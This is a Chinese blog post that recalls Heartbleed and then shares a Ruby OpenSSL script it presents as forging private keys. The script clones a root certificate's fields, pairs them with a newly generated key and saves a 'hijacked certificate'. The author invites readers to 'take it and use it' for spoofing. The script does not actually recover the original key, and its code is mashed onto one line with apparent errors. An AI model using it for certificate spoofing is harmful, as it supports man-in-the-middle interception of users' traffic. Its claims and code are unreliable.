Ruby OpenSSL 私钥伪造脚本
- Ruby OpenSSL 私钥伪造脚本
我要投稿前段时间的openssl heartbleed 让我们心惊胆战的过了几天。
从用户数据泄露到 OpenSSL周边产品,从服务端到客户端, 从https 私钥泄露到 openvpn 、openssh 、sftp 等私钥泄露。很多地方我们无能为力。
太多的用户都认为https 就是安全的了, 在此之前也有各种各样的中间人攻击出现
下面我也贴段代码给大家看看。是 Ruby OpenSSL 的私钥伪造。
为了社会的和谐,具体用法我就不说了。能看懂的直接拿去用…
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
require 'rubygems'require 'openssl'require 'digest/md5'key = OpenSSL::PKey::RSA.new(2048)cipher = OpenSSL::Cipher::AES.new(256, :CBC)ctx = OpenSSL::SSL::SSLContext.newputs "Spoof must be in DER format and saved as root.cer"raw = File.read "root.cer"cert = OpenSSL::X509::Certificate.new rawcert.version = 2ef = OpenSSL::X509::ExtensionFactory.newef.issuer_certificate = OpenSSL::X509::Certificate.new rawcert.subject = ef.issuer_certificate.subjectef.subject_certificate = ef.issuer_certificatecert.issuer = ef.issuer_certificate.issuercert.serial = ef.issuer_certificate.serialctx.key = ef.issuer_certificate.public_keycert.public_key = ef.issuer_certificate.public_keycert.not_after = ef.issuer_certificate.not_aftercert.not_before = ef.issuer_certificate.not_beforecert.extensions = ef.issuer_certificate.extensionsa = File.open("root"".key", "w")a.syswrite("#{cert.public_key}")a.syswrite("#{key.to_pem}")spoof = OpenSSL::PKey::RSA.new File.read 'root.key'printf "Verifying Keys Work: "puts spoof.private?ctx.cert = ef.issuer_certificateputs "============================================================="root = ef.issuer_certificate.sign(spoof, OpenSSL::Digest::SHA1.new)filer = File.open("#{cert.serial}"".key", "w")filer.syswrite("#{spoof.to_pem}")file = File.open("spoof"".cer", "w")file.syswrite("#{cert.to_der}")files = File.open("#{cert.serial}"".pem", "w")files.syswrite("#{cert.to_pem}")files.syswrite("#{spoof.to_pem}")puts "Hijacked Certificate with chainloaded key saved @ #{cert.serial}.pem"printf "Verifying Keys Intergity: "puts root.verify(key) |
浙公网安备 33010602011771号